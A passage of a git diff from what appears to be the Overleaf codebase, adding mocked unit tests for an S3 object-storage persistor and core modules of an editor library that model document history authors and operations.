expect(PersistorFactory(Settings)).to.respondTo('wrappedMethod') + expect(PersistorFactory(Settings).wrappedMethod()).to.equal('FSPersistor') + }) + + it('should forward useSubdirectories=true to FSPersistor', function () { + Settings.backend = 'fs' + Settings.useSubdirectories = true + + expect(PersistorFactory(Settings).settings.useSubdirectories).to.be.true + }) + + it('should forward useSubdirectories=false to FSPersistor', function () { + Settings.backend = 'fs' + Settings.useSubdirectories = false + + expect(PersistorFactory(Settings).settings.useSubdirectories).to.be.false + }) + + it('should throw an error when the backend is not configured', function () { + try { + PersistorFactory(Settings) + } catch (err) { + expect(err.message).to.equal('no backend specified - config incomplete') + return + } + expect('should have caught an error').not.to.exist + }) + + it('should throw an error when the backend is unknown', function () { + Settings.backend = 'magic' + try { + PersistorFactory(Settings) + } catch (err) { + expect(err.message).to.equal('unknown backend') + expect(err.info.backend).to.equal('magic') + return + } + expect('should have caught an error').not.to.exist + }) +}) diff --git a/libraries/object-persistor/test/unit/S3PersistorTests.js b/libraries/object-persistor/test/unit/S3PersistorTests.js new file mode 100644 index 0000000..822a4ac --- /dev/null +++ b/libraries/object-persistor/test/unit/S3PersistorTests.js @@ -0,0 +1,1048 @@ +const sinon = require('sinon') +const chai = require('chai') +const { expect } = chai +const SandboxedModule = require('sandboxed-module') +const Errors = require('../../src/Errors') +const { EventEmitter } = require('node:events') + +const MODULE_PATH = '../../src/S3Persistor.js' + +describe('S3PersistorTests', function () { + const defaultS3Key = 'frog' + const defaultS3Secret = 'prince' + const defaultS3Credentials = { + credentials: { + accessKeyId: defaultS3Key, + secretAccessKey: defaultS3Secret, + }, + } + const filename = '/wombat/potato.tex' + const bucket = 'womBucket' + const key = 'monKey' + const destKey = 'donKey' + const objectSize = 5555 + const genericError = new Error('guru meditation error') + const files = [ + { Key: 'llama', Size: 11 }, + { Key: 'hippo', Size: 22 }, + ] + const filesSize = 33 + const md5 = 'ffffffff00000000ffffffff00000000' + const redirectUrl = 'https://wombat.potato/giraffe' + + let Logger, + Transform, + PassThrough, + S3, + Fs, + ReadStream, + Stream, + StreamPromises, + S3GetObjectRequest, + S3Persistor, + S3Client, + S3NotFoundError, + S3AccessDeniedError, + FileNotFoundError, + EmptyPromise, + settings, + Hash, + crypto + + beforeEach(function () { + settings = { + secret: defaultS3Secret, + key: defaultS3Key, + partSize: 100 * 1024 * 1024, + } + + Transform = class { + once() {} + } + + PassThrough = class {} + + Stream = { + Transform, + PassThrough, + pipeline: sinon.stub().yields(), + } + + StreamPromises = { + pipeline: sinon.stub().resolves(), + } + + EmptyPromise = { + promise: sinon.stub().resolves(), + } + + ReadStream = new EventEmitter() + class FakeS3GetObjectRequest extends EventEmitter { + constructor() { + super() + this.statusCode = 200 + this.err = null + this.aborted = false + } + + abort() { + this.aborted = true + } + + createReadStream() { + setTimeout(() => { + if (this.notFoundSSEC) { + // special case for AWS S3: 404 NoSuchKey wrapped in a 400. A single request received a single response, and multiple httpHeaders events are triggered. Don't ask. 
+ this.emit('httpHeaders', 400, {}) + this.emit('httpHeaders', 404, {}) + ReadStream.emit('error', S3NotFoundError) + return + } + + if (this.err) return ReadStream.emit('error', this.err) + this.emit('httpHeaders', this.statusCode, {}) + if (this.statusCode === 403) { + ReadStream.emit('error', S3AccessDeniedError) + } + if (this.statusCode === 404) { + ReadStream.emit('error', S3NotFoundError) + } + }) + return ReadStream + } + } + S3GetObjectRequest = new FakeS3GetObjectRequest() + + FileNotFoundError = new Error('File not found') + FileNotFoundError.code = 'ENOENT' + + Fs = { + createReadStream: sinon.stub().returns(ReadStream), + } + + S3NotFoundError = new Error('not found') + S3NotFoundError.code = 'NoSuchKey' + + S3AccessDeniedError = new Error('access denied') + S3AccessDeniedError.code = 'AccessDenied' + + S3Client = { + getObject: sinon.stub().returns(S3GetObjectRequest), + headObject: sinon.stub().returns({ + promise: sinon.stub().resolves({ + ContentLength: objectSize, + ETag: md5, + }), + }), + listObjectsV2: sinon.stub().returns({ + promise: sinon.stub().resolves({ + Contents: files, + }), + }), + upload: sinon + .stub() + .returns({ promise: sinon.stub().resolves({ ETag: `"${md5}"` }) }), + copyObject: sinon.stub().returns(EmptyPromise), + deleteObject: sinon.stub().returns(EmptyPromise), + deleteObjects: sinon.stub().returns(EmptyPromise), + getSignedUrlPromise: sinon.stub().resolves(redirectUrl), + } + S3 = sinon.stub().callsFake(() => Object.assign({}, S3Client)) + + Hash = { + end: sinon.stub(), + read: sinon.stub().returns(md5), + setEncoding: sinon.stub(), + } + crypto = { + createHash: sinon.stub().returns(Hash), + } + + Logger = { + warn: sinon.stub(), + } + + S3Persistor = new (SandboxedModule.require(MODULE_PATH, { + requires: { + 'aws-sdk/clients/s3': S3, + '@overleaf/logger': Logger, + './Errors': Errors, + fs: Fs, + stream: Stream, + 'stream/promises': StreamPromises, + crypto, + }, + globals: { console, Buffer }, + }).S3Persistor)(settings) + }) + + describe('getObjectStream', function () { + describe('when called with valid parameters', function () { + let stream + + beforeEach(async function () { + stream = await S3Persistor.getObjectStream(bucket, key) + }) + + it('returns a PassThrough stream', function () { + expect(stream).to.be.instanceOf(PassThrough) + }) + + it('sets the AWS client up with credentials from settings', function () { + expect(S3).to.have.been.calledWith(defaultS3Credentials) + }) + + it('fetches the right key from the right bucket', function () { + expect(S3Client.getObject).to.have.been.calledWith({ + Bucket: bucket, + Key: key, + }) + }) + + it('pipes the stream through the meter', async function () { + expect(Stream.pipeline).to.have.been.calledWith( + ReadStream, + sinon.match.instanceOf(Transform), + sinon.match.instanceOf(PassThrough) + ) + }) + + it('does not abort the request', function () { + expect(S3GetObjectRequest.aborted).to.equal(false) + }) + }) + + describe('when called with a byte range', function () { + let stream + + beforeEach(async function () { + stream = await S3Persistor.getObjectStream(bucket, key, { + start: 5, + end: 10, + }) + }) + + it('returns a PassThrough stream', function () { + expect(stream).to.be.instanceOf(Stream.PassThrough) + }) + + it('passes the byte range on to S3', function () { + expect(S3Client.getObject).to.have.been.calledWith({ + Bucket: bucket, + Key: key, + Range: 'bytes=5-10', + }) + }) + }) + + describe('when streaming fails', function () { + let stream + + beforeEach(async function () 
{ + Stream.pipeline.yields(new Error()) + stream = await S3Persistor.getObjectStream(bucket, key) + }) + + it('returns a PassThrough stream', function () { + expect(stream).to.be.instanceOf(Stream.PassThrough) + }) + + it('aborts the request', function () { + expect(S3GetObjectRequest.aborted).to.equal(true) + }) + }) + + describe('when there are alternative credentials', function () { + let stream + const alternativeSecret = 'giraffe' + const alternativeKey = 'hippo' + const alternativeS3Credentials = { + credentials: { + accessKeyId: alternativeKey, + secretAccessKey: alternativeSecret, + }, + } + + beforeEach(async function () { + settings.bucketCreds = {} + settings.bucketCreds[bucket] = { + auth_key: alternativeKey, + auth_secret: alternativeSecret, + } + + stream = await S3Persistor.getObjectStream(bucket, key) + }) + + it('returns a PassThrough stream', function () { + expect(stream).to.be.instanceOf(Stream.PassThrough) + }) + + it('sets the AWS client up with the alternative credentials', function () { + expect(S3).to.have.been.calledWith(alternativeS3Credentials) + }) + + it('fetches the right key from the right bucket', function () { + expect(S3Client.getObject).to.have.been.calledWith({ + Bucket: bucket, + Key: key, + }) + }) + + it('uses the default credentials for an unknown bucket', async function () { + stream = await S3Persistor.getObjectStream('anotherBucket', key) + + expect(S3).to.have.been.calledTwice + expect(S3.firstCall).to.have.been.calledWith(alternativeS3Credentials) + expect(S3.secondCall).to.have.been.calledWith(defaultS3Credentials) + }) + }) + + describe('without hard-coded credentials', function () { + it('uses the default provider chain', async function () { + delete settings.key + delete settings.secret + + await S3Persistor.getObjectStream(bucket, key) + expect(S3).to.have.been.calledOnce + expect(S3.args[0].credentials).to.not.exist + }) + }) + + describe('when given S3 options', function () { + const httpOptions = { timeout: 2000 } + const maxRetries = 2 + + beforeEach(async function () { + settings.httpOptions = httpOptions + settings.maxRetries = maxRetries + await S3Persistor.getObjectStream(bucket, key) + }) + + it('configures the S3 client appropriately', function () { + expect(S3).to.have.been.calledWithMatch({ httpOptions, maxRetries }) + }) + }) + + describe("when the file doesn't exist", function () { + let error, stream + + beforeEach(async function () { + S3GetObjectRequest.statusCode = 404 + try { + stream = await S3Persistor.getObjectStream(bucket, key) + } catch (err) { + error = err + } + }) + + it('does not return a stream', function () { + expect(stream).not.to.exist + }) + + it('throws a NotFoundError', function () { + expect(error).to.be.an.instanceOf(Errors.NotFoundError) + }) + + it('wraps the error', function () { + expect(error.cause).to.exist + }) + + it('stores the bucket and key in the error', function () { + expect(error.info).to.include({ bucketName: bucket, key }) + }) + }) + + describe("when the file doesn't exist -- SSEC", function () { + let error, stream + + beforeEach(async function () { + S3GetObjectRequest.notFoundSSEC = 404 + try { + stream = await S3Persistor.getObjectStream(bucket, key) + } catch (err) { + error = err + } + }) + it('does not return a stream', function () { + expect(stream).not.to.exist + }) + + it('throws a NotFoundError', function () { + expect(error).to.be.an.instanceOf(Errors.NotFoundError) + }) + + it('wraps the error', function () { + expect(error.cause).to.exist + }) + + it('stores the bucket 
and key in the error', function () { + expect(error.info).to.include({ bucketName: bucket, key }) + }) + }) + + describe('when access to the file is denied', function () { + let error, stream + + beforeEach(async function () { + S3GetObjectRequest.statusCode = 403 + try { + stream = await S3Persistor.getObjectStream(bucket, key) + } catch (err) { + error = err + } + }) + + it('does not return a stream', function () { + expect(stream).not.to.exist + }) + + it('throws a NotFoundError', function () { + expect(error).to.be.an.instanceOf(Errors.NotFoundError) + }) + + it('wraps the error', function () { + expect(error.cause).to.equal(S3AccessDeniedError) + }) + + it('stores the bucket and key in the error', function () { + expect(error.info).to.include({ bucketName: bucket, key }) + }) + }) + + describe('when S3 encounters an unknown error', function () { + let error, stream + + beforeEach(async function () { + S3GetObjectRequest.err = genericError + try { + stream = await S3Persistor.getObjectStream(bucket, key) + } catch (err) { + error = err + } + }) + + it('does not return a stream', function () { + expect(stream).not.to.exist + }) + + it('throws a ReadError', function () { + expect(error).to.be.an.instanceOf(Errors.ReadError) + }) + + it('wraps the error', function () { + expect(error.cause).to.exist + }) + + it('stores the bucket and key in the error', function () { + expect(error.info).to.include({ bucketName: bucket, key }) + }) + }) + }) + + describe('getRedirectUrl', function () { + let signedUrl + + beforeEach(async function () { + signedUrl = await S3Persistor.getRedirectUrl(bucket, key) + }) + + it('should request a signed URL', function () { + expect(S3Client.getSignedUrlPromise).to.have.been.called + }) + + it('should return the url', function () { + expect(signedUrl).to.equal(redirectUrl) + }) + }) + + describe('getObjectSize', function () { + describe('when called with valid parameters', function () { + let size + + beforeEach(async function () { + size = await S3Persistor.getObjectSize(bucket, key) + }) + + it('should return the object size', function () { + expect(size).to.equal(objectSize) + }) + + it('should pass the bucket and key to S3', function () { + expect(S3Client.headObject).to.have.been.calledWith({ + Bucket: bucket, + Key: key, + }) + }) + }) + + describe('when the object is not found', function () { + let error + + beforeEach(async function () { + S3Client.headObject = sinon.stub().returns({ + promise: sinon.stub().rejects(S3NotFoundError), + }) + try { + await S3Persistor.getObjectSize(bucket, key) + } catch (err) { + error = err + } + }) + + it('should return a NotFoundError', function () { + expect(error).to.be.an.instanceOf(Errors.NotFoundError) + }) + + it('should wrap the error', function () { + expect(error.cause).to.equal(S3NotFoundError) + }) + }) + + describe('when S3 returns an error', function () { + let error + + beforeEach(async function () { + S3Client.headObject = sinon.stub().returns({ + promise: sinon.stub().rejects(genericError), + }) + try { + await S3Persistor.getObjectSize(bucket, key) + } catch (err) { + error = err + } + }) + + it('should return a ReadError', function () { + expect(error).to.be.an.instanceOf(Errors.ReadError) + }) + + it('should wrap the error', function () { + expect(error.cause).to.equal(genericError) + }) + }) + }) + + describe('sendStream', function () { + describe('with valid parameters', function () { + beforeEach(async function () { + return S3Persistor.sendStream(bucket, key, ReadStream) + }) + + it('should upload 
the stream', function () { + expect(S3Client.upload).to.have.been.calledWith({ + Bucket: bucket, + Key: key, + Body: sinon.match.instanceOf(Stream.Transform), + }) + }) + + it('should upload files in a single part', function () { + expect(S3Client.upload).to.have.been.calledWith(sinon.match.any, { + partSize: 100 * 1024 * 1024, + }) + }) + + it('should meter the stream', function () { + expect(Stream.pipeline).to.have.been.calledWith( + ReadStream, + sinon.match.instanceOf(Stream.Transform) + ) + }) + }) + + describe('when a hash is supplied', function () { + beforeEach(async function () { + return S3Persistor.sendStream(bucket, key, ReadStream, { + sourceMd5: 'aaaaaaaabbbbbbbbaaaaaaaabbbbbbbb', + }) + }) + + it('sends the hash in base64', function () { + expect(S3Client.upload).to.have.been.calledWith({ + Bucket: bucket, + Key: key, + Body: sinon.match.instanceOf(Transform), + ContentMD5: 'qqqqqru7u7uqqqqqu7u7uw==', + }) + }) + }) + + describe('when metadata is supplied', function () { + const contentType = 'text/csv' + const contentEncoding = 'gzip' + + beforeEach(async function () { + return S3Persistor.sendStream(bucket, key, ReadStream, { + contentType, + contentEncoding, + }) + }) + + it('sends the metadata to S3', function () { + expect(S3Client.upload).to.have.been.calledWith({ + Bucket: bucket, + Key: key, + Body: sinon.match.instanceOf(Transform), + ContentType: contentType, + ContentEncoding: contentEncoding, + }) + }) + }) + + describe('when the upload fails', function () { + let error + beforeEach(async function () { + S3Client.upload = sinon.stub().returns({ + promise: sinon.stub().rejects(genericError), + }) + try { + await S3Persistor.sendStream(bucket, key, ReadStream) + } catch (err) { + error = err + } + }) + + it('throws a WriteError', function () { + expect(error).to.be.an.instanceOf(Errors.WriteError) + }) + }) + }) + + describe('sendFile', function () { + describe('with valid parameters', function () { + beforeEach(async function () { + return S3Persistor.sendFile(bucket, key, filename) + }) + + it('should create a read stream for the file', function () { + expect(Fs.createReadStream).to.have.been.calledWith(filename) + }) + + it('should upload the stream', function () { + expect(S3Client.upload).to.have.been.calledWith({ + Bucket: bucket, + Key: key, + Body: sinon.match.instanceOf(Transform), + }) + }) + }) + }) + + describe('getObjectMd5Hash', function () { + describe('when the etag is a valid md5 hash', function () { + let hash + beforeEach(async function () { + hash = await S3Persistor.getObjectMd5Hash(bucket, key) + }) + + it('should return the object hash', function () { + expect(hash).to.equal(md5) + }) + + it('should get the hash from the object metadata', function () { + expect(S3Client.headObject).to.have.been.calledWith({ + Bucket: bucket, + Key: key, + }) + }) + + it('should not download the object', function () { + expect(S3Client.getObject).not.to.have.been.called + }) + }) + + describe("when the etag isn't a valid md5 hash", function () { + let hash + beforeEach(async function () { + S3Client.headObject = sinon.stub().returns({ + promise: sinon.stub().resolves({ + ETag: 'somethingthatisntanmd5', + Bucket: bucket, + Key: key, + }), + }) + + hash = await S3Persistor.getObjectMd5Hash(bucket, key) + }) + + it('should re-fetch the file to verify it', function () { + expect(S3Client.getObject).to.have.been.calledWith({ + Bucket: bucket, + Key: key, + }) + }) + + it('should calculate the md5 hash from the file', function () { + 
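+ // Hash is the stubbed crypto md5; reading it back is how the persistor + // recovers the digest after piping the object through it. Relatedly, the + // base64 ContentMD5 asserted in sendStream above is just the hex digest + // re-encoded: + //   Buffer.from('aaaaaaaabbbbbbbbaaaaaaaabbbbbbbb', 'hex').toString('base64') + //   // => 'qqqqqru7u7uqqqqqu7u7uw=='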
expect(Hash.read).to.have.been.called + }) + + it('should return the md5 hash', function () { + expect(hash).to.equal(md5) + }) + }) + }) + + describe('copyObject', function () { + describe('with valid parameters', function () { + beforeEach(async function () { + return S3Persistor.copyObject(bucket, key, destKey) + }) + + it('should copy the object', function () { + expect(S3Client.copyObject).to.have.been.calledWith({ + Bucket: bucket, + Key: destKey, + CopySource: `${bucket}/${key}`, + }) + }) + }) + + describe('when the file does not exist', function () { + let error + + beforeEach(async function () { + S3Client.copyObject = sinon.stub().returns({ + promise: sinon.stub().rejects(S3NotFoundError), + }) + try { + await S3Persistor.copyObject(bucket, key, destKey) + } catch (err) { + error = err + } + }) + + it('should throw a NotFoundError', function () { + expect(error).to.be.an.instanceOf(Errors.NotFoundError) + }) + }) + }) + + describe('deleteObject', function () { + describe('with valid parameters', function () { + beforeEach(async function () { + return S3Persistor.deleteObject(bucket, key) + }) + + it('should delete the object', function () { + expect(S3Client.deleteObject).to.have.been.calledWith({ + Bucket: bucket, + Key: key, + }) + }) + }) + }) + + describe('deleteDirectory', function () { + describe('with valid parameters', function () { + beforeEach(async function () { + return S3Persistor.deleteDirectory(bucket, key) + }) + + it('should list the objects in the directory', function () { + expect(S3Client.listObjectsV2).to.have.been.calledWith({ + Bucket: bucket, + Prefix: key, + }) + }) + + it('should delete the objects using their keys', function () { + expect(S3Client.deleteObjects).to.have.been.calledWith({ + Bucket: bucket, + Delete: { + Objects: [{ Key: 'llama' }, { Key: 'hippo' }], + Quiet: true, + }, + }) + }) + }) + + describe('when there are no files', function () { + beforeEach(async function () { + S3Client.listObjectsV2 = sinon + .stub() + .returns({ promise: sinon.stub().resolves({ Contents: [] }) }) + return S3Persistor.deleteDirectory(bucket, key) + }) + + it('should list the objects in the directory', function () { + expect(S3Client.listObjectsV2).to.have.been.calledWith({ + Bucket: bucket, + Prefix: key, + }) + }) + + it('should not try to delete any objects', function () { + expect(S3Client.deleteObjects).not.to.have.been.called + }) + }) + + describe('when there are more files available', function () { + const continuationToken = 'wombat' + beforeEach(async function () { + S3Client.listObjectsV2.onCall(0).returns({ + promise: sinon.stub().resolves({ + Contents: files, + IsTruncated: true, + NextContinuationToken: continuationToken, + }), + }) + + return S3Persistor.deleteDirectory(bucket, key) + }) + + it('should list the objects a second time, with a continuation token', function () { + expect(S3Client.listObjectsV2).to.be.calledTwice + expect(S3Client.listObjectsV2).to.be.calledWith({ + Bucket: bucket, + Prefix: key, + }) + expect(S3Client.listObjectsV2).to.be.calledWith({ + Bucket: bucket, + Prefix: key, + ContinuationToken: continuationToken, + }) + }) + + it('should delete both sets of files', function () { + expect(S3Client.deleteObjects).to.have.been.calledTwice + }) + }) + + describe('when there is an error listing the objects', function () { + let error + + beforeEach(async function () { + S3Client.listObjectsV2 = sinon + .stub() + .returns({ promise: sinon.stub().rejects(genericError) }) + try { + await S3Persistor.deleteDirectory(bucket, key) + 
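+ // Listing fails here, so no delete should be attempted. For reference, the + // pagination contract exercised above is the standard listObjectsV2 loop + // (a sketch): + //   let token + //   do { + //     const page = await s3 + //       .listObjectsV2({ Bucket, Prefix, ContinuationToken: token }) + //       .promise() + //     // delete page.Contents here + //     token = page.IsTruncated ? page.NextContinuationToken : undefined + //   } while (token)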
} catch (err) { + error = err + } + }) + + it('should generate a ReadError', function () { + expect(error).to.be.an.instanceOf(Errors.ReadError) + }) + + it('should wrap the error', function () { + expect(error.cause).to.equal(genericError) + }) + + it('should not try to delete any objects', function () { + expect(S3Client.deleteObjects).not.to.have.been.called + }) + }) + + describe('when there is an error deleting the objects', function () { + let error + + beforeEach(async function () { + S3Client.deleteObjects = sinon + .stub() + .returns({ promise: sinon.stub().rejects(genericError) }) + try { + await S3Persistor.deleteDirectory(bucket, key) + } catch (err) { + error = err + } + }) + + it('should generate a WriteError', function () { + expect(error).to.be.an.instanceOf(Errors.WriteError) + }) + + it('should wrap the error', function () { + expect(error.cause).to.equal(genericError) + }) + }) + }) + + describe('directorySize', function () { + describe('with valid parameters', function () { + let size + + beforeEach(async function () { + size = await S3Persistor.directorySize(bucket, key) + }) + + it('should list the objects in the directory', function () { + expect(S3Client.listObjectsV2).to.have.been.calledWith({ + Bucket: bucket, + Prefix: key, + }) + }) + + it('should return the directory size', function () { + expect(size).to.equal(filesSize) + }) + }) + + describe('when there are no files', function () { + let size + + beforeEach(async function () { + S3Client.listObjectsV2 = sinon + .stub() + .returns({ promise: sinon.stub().resolves({ Contents: [] }) }) + size = await S3Persistor.directorySize(bucket, key) + }) + + it('should list the objects in the directory', function () { + expect(S3Client.listObjectsV2).to.have.been.calledWith({ + Bucket: bucket, + Prefix: key, + }) + }) + + it('should return zero', function () { + expect(size).to.equal(0) + }) + }) + + describe('when there are more files available', function () { + const continuationToken = 'wombat' + let size + beforeEach(async function () { + S3Client.listObjectsV2.onCall(0).returns({ + promise: sinon.stub().resolves({ + Contents: files, + IsTruncated: true, + NextContinuationToken: continuationToken, + }), + }) + + size = await S3Persistor.directorySize(bucket, key) + }) + + it('should list the objects a second time, with a continuation token', function () { + expect(S3Client.listObjectsV2).to.be.calledTwice + expect(S3Client.listObjectsV2).to.be.calledWith({ + Bucket: bucket, + Prefix: key, + }) + expect(S3Client.listObjectsV2).to.be.calledWith({ + Bucket: bucket, + Prefix: key, + ContinuationToken: continuationToken, + }) + }) + + it('should return the size of both sets of files', function () { + expect(size).to.equal(filesSize * 2) + }) + }) + + describe('when there is an error listing the objects', function () { + let error + + beforeEach(async function () { + S3Client.listObjectsV2 = sinon + .stub() + .returns({ promise: sinon.stub().rejects(genericError) }) + try { + await S3Persistor.directorySize(bucket, key) + } catch (err) { + error = err + } + }) + + it('should generate a ReadError', function () { + expect(error).to.be.an.instanceOf(Errors.ReadError) + }) + + it('should wrap the error', function () { + expect(error.cause).to.equal(genericError) + }) + }) + }) + + describe('checkIfObjectExists', function () { + describe('when the file exists', function () { + let exists + + beforeEach(async function () { + exists = await S3Persistor.checkIfObjectExists(bucket, key) + }) + + it('should get the object header', 
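+ /* checkIfObjectExists maps headObject outcomes: success means true, a + NotFoundError means false, and anything else is re-wrapped, which is why + the unknown-error case below ends up as a ReadError whose cause is itself + a ReadError around the original error. */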
function () { + expect(S3Client.headObject).to.have.been.calledWith({ + Bucket: bucket, + Key: key, + }) + }) + + it('should return that the file exists', function () { + expect(exists).to.equal(true) + }) + }) + + describe('when the file does not exist', function () { + let exists + + beforeEach(async function () { + S3Client.headObject = sinon + .stub() + .returns({ promise: sinon.stub().rejects(S3NotFoundError) }) + exists = await S3Persistor.checkIfObjectExists(bucket, key) + }) + + it('should get the object header', function () { + expect(S3Client.headObject).to.have.been.calledWith({ + Bucket: bucket, + Key: key, + }) + }) + + it('should return that the file does not exist', function () { + expect(exists).to.equal(false) + }) + }) + + describe('when there is an error', function () { + let error + + beforeEach(async function () { + S3Client.headObject = sinon + .stub() + .returns({ promise: sinon.stub().rejects(genericError) }) + try { + await S3Persistor.checkIfObjectExists(bucket, key) + } catch (err) { + error = err + } + }) + + it('should generate a ReadError', function () { + expect(error).to.be.an.instanceOf(Errors.ReadError) + }) + + it('should wrap the upstream ReadError', function () { + expect(error.cause).to.be.an.instanceOf(Errors.ReadError) + }) + + it('should eventually wrap the error', function () { + expect(error.cause.cause).to.equal(genericError) + }) + }) + }) + + describe('_getClientForBucket', function () { + it('should return same instance for same bucket', function () { + const a = S3Persistor._getClientForBucket('foo') + const b = S3Persistor._getClientForBucket('foo') + expect(a).to.equal(b) + }) + it('should return different instance for different bucket', function () { + const a = S3Persistor._getClientForBucket('foo') + const b = S3Persistor._getClientForBucket('bar') + expect(a).to.not.equal(b) + }) + it('should return different instance for same bucket different computeChecksums', function () { + const a = S3Persistor._getClientForBucket('foo', false) + const b = S3Persistor._getClientForBucket('foo', true) + expect(a).to.not.equal(b) + }) + }) +}) diff --git a/libraries/object-persistor/tsconfig.json b/libraries/object-persistor/tsconfig.json new file mode 100644 index 0000000..d43bb24 --- /dev/null +++ b/libraries/object-persistor/tsconfig.json @@ -0,0 +1,7 @@ +{ + "extends": "../../tsconfig.backend.json", + "include": [ + "**/*.js", + "**/*.cjs" + ] +} diff --git a/libraries/overleaf-editor-core/.gitignore b/libraries/overleaf-editor-core/.gitignore new file mode 100644 index 0000000..869500a --- /dev/null +++ b/libraries/overleaf-editor-core/.gitignore @@ -0,0 +1,5 @@ +/coverage +/node_modules + +# managed by monorepo$ bin/update_build_scripts +.npmrc diff --git a/libraries/overleaf-editor-core/.nvmrc b/libraries/overleaf-editor-core/.nvmrc new file mode 100644 index 0000000..0254b1e --- /dev/null +++ b/libraries/overleaf-editor-core/.nvmrc @@ -0,0 +1 @@ +20.18.2 diff --git a/libraries/overleaf-editor-core/buildscript.txt b/libraries/overleaf-editor-core/buildscript.txt new file mode 100644 index 0000000..03b7f06 --- /dev/null +++ b/libraries/overleaf-editor-core/buildscript.txt @@ -0,0 +1,10 @@ +overleaf-editor-core +--dependencies=None +--docker-repos=gcr.io/overleaf-ops +--env-add= +--env-pass-through= +--esmock-loader=False +--is-library=True +--node-version=20.18.2 +--public-repo=False +--script-version=4.7.0 diff --git a/libraries/overleaf-editor-core/index.js b/libraries/overleaf-editor-core/index.js new file mode 100644 index 0000000..df3548c 
--- /dev/null +++ b/libraries/overleaf-editor-core/index.js @@ -0,0 +1,89 @@ +const AddCommentOperation = require('./lib/operation/add_comment_operation') +const Author = require('./lib/author') +const AuthorList = require('./lib/author_list') +const Blob = require('./lib/blob') +const Change = require('./lib/change') +const ChangeRequest = require('./lib/change_request') +const ChangeNote = require('./lib/change_note') +const Chunk = require('./lib/chunk') +const ChunkResponse = require('./lib/chunk_response') +const Comment = require('./lib/comment') +const DeleteCommentOperation = require('./lib/operation/delete_comment_operation') +const File = require('./lib/file') +const FileMap = require('./lib/file_map') +const History = require('./lib/history') +const Label = require('./lib/label') +const AddFileOperation = require('./lib/operation/add_file_operation') +const MoveFileOperation = require('./lib/operation/move_file_operation') +const SetCommentStateOperation = require('./lib/operation/set_comment_state_operation') +const EditFileOperation = require('./lib/operation/edit_file_operation') +const EditNoOperation = require('./lib/operation/edit_no_operation') +const SetFileMetadataOperation = require('./lib/operation/set_file_metadata_operation') +const NoOperation = require('./lib/operation/no_operation') +const Operation = require('./lib/operation') +const RestoreOrigin = require('./lib/origin/restore_origin') +const RestoreFileOrigin = require('./lib/origin/restore_file_origin') +const Origin = require('./lib/origin') +const OtClient = require('./lib/ot_client') +const TextOperation = require('./lib/operation/text_operation') +const EditOperation = require('./lib/operation/edit_operation') +const safePathname = require('./lib/safe_pathname') +const Snapshot = require('./lib/snapshot') +const util = require('./lib/util') +const V2DocVersions = require('./lib/v2_doc_versions') +const { + InsertOp, + RemoveOp, + RetainOp, + ScanOp, +} = require('./lib/operation/scan_op') +const TrackedChange = require('./lib/file_data/tracked_change') +const TrackedChangeList = require('./lib/file_data/tracked_change_list') +const TrackingProps = require('./lib/file_data/tracking_props') +const Range = require('./lib/range') +const CommentList = require('./lib/file_data/comment_list') +const LazyStringFileData = require('./lib/file_data/lazy_string_file_data') + +exports.AddCommentOperation = AddCommentOperation +exports.Author = Author +exports.AuthorList = AuthorList +exports.Blob = Blob +exports.Change = Change +exports.ChangeRequest = ChangeRequest +exports.ChangeNote = ChangeNote +exports.Chunk = Chunk +exports.ChunkResponse = ChunkResponse +exports.Comment = Comment +exports.DeleteCommentOperation = DeleteCommentOperation +exports.File = File +exports.FileMap = FileMap +exports.LazyStringFileData = LazyStringFileData +exports.History = History +exports.Label = Label +exports.AddFileOperation = AddFileOperation +exports.MoveFileOperation = MoveFileOperation +exports.SetCommentStateOperation = SetCommentStateOperation +exports.EditFileOperation = EditFileOperation +exports.EditNoOperation = EditNoOperation +exports.SetFileMetadataOperation = SetFileMetadataOperation +exports.NoOperation = NoOperation +exports.Operation = Operation +exports.RestoreOrigin = RestoreOrigin +exports.RestoreFileOrigin = RestoreFileOrigin +exports.Origin = Origin +exports.OtClient = OtClient +exports.TextOperation = TextOperation +exports.EditOperation = EditOperation +exports.safePathname = safePathname +exports.Snapshot 
= Snapshot +exports.util = util +exports.V2DocVersions = V2DocVersions +exports.ScanOp = ScanOp +exports.InsertOp = InsertOp +exports.RetainOp = RetainOp +exports.RemoveOp = RemoveOp +exports.TrackedChangeList = TrackedChangeList +exports.TrackedChange = TrackedChange +exports.Range = Range +exports.CommentList = CommentList +exports.TrackingProps = TrackingProps diff --git a/libraries/overleaf-editor-core/lib/author.js b/libraries/overleaf-editor-core/lib/author.js new file mode 100644 index 0000000..10d305f --- /dev/null +++ b/libraries/overleaf-editor-core/lib/author.js @@ -0,0 +1,72 @@ +'use strict' + +const assert = require('check-types').assert + +/** + * An author of a {@link Change}. We want to store user IDs, and then fill in + * the other properties (which the user can change over time) when changes are + * loaded. + * + * At present, we're assuming that all authors have a user ID; we may need to + * generalise this to cover users for whom we only have a name and email, e.g. + * from git. For now, though, this seems to do what we need. + */ +class Author { + /** + * @param {number} id + * @param {string} email + * @param {string} name + */ + constructor(id, email, name) { + assert.number(id, 'bad id') + assert.string(email, 'bad email') + assert.string(name, 'bad name') + + this.id = id + this.email = email + this.name = name + } + + /** + * Create an Author from its raw form. + * + * @param {Object} [raw] + * @return {Author | null} + */ + static fromRaw(raw) { + if (!raw) return null + return new Author(raw.id, raw.email, raw.name) + } + + /** + * Convert the Author to raw form for storage or transmission. + * + * @return {Object} + */ + toRaw() { + return { id: this.id, email: this.email, name: this.name } + } + + /** + * @return {number} + */ + getId() { + return this.id + } + + /** + * @return {string} + */ + getEmail() { + return this.email + } + + /** + * @return {string} + */ + getName() { + return this.name + } +} + +module.exports = Author diff --git a/libraries/overleaf-editor-core/lib/author_list.js b/libraries/overleaf-editor-core/lib/author_list.js new file mode 100644 index 0000000..f24c1f9 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/author_list.js @@ -0,0 +1,45 @@ +/** @module */ + +'use strict' + +const _ = require('lodash') +const check = require('check-types') + +const Author = require('./author') + +/** + * Check that every member of the list is a number or every member is + * an Author value, disregarding null or undefined values. + * + * @param {Array.<number | Author>} authors author list + * @param {string} msg + */ +function assertV1(authors, msg) { + const authors_ = authors.filter(function (a) { + return a !== null && a !== undefined + }) + + if (authors_.length > 0) { + const checker = check.integer(authors_[0]) + ? check.assert.integer + : _.partial(check.assert.instance, _, Author) + _.each(authors_, function (author) { + checker(author, msg) + }) + } +} + +/** + * Check that every member of the list is a v2 author ID, disregarding + * null or undefined values. 
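+ * (Illustrative only: a v2 author ID is a 24-character lowercase-hex, + * Mongo-style ID, so assertV2(['aaaaaaaaaaaaaaaaaaaaaaaa', null], msg) + * passes, while assertV2(['bob'], msg) throws.)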
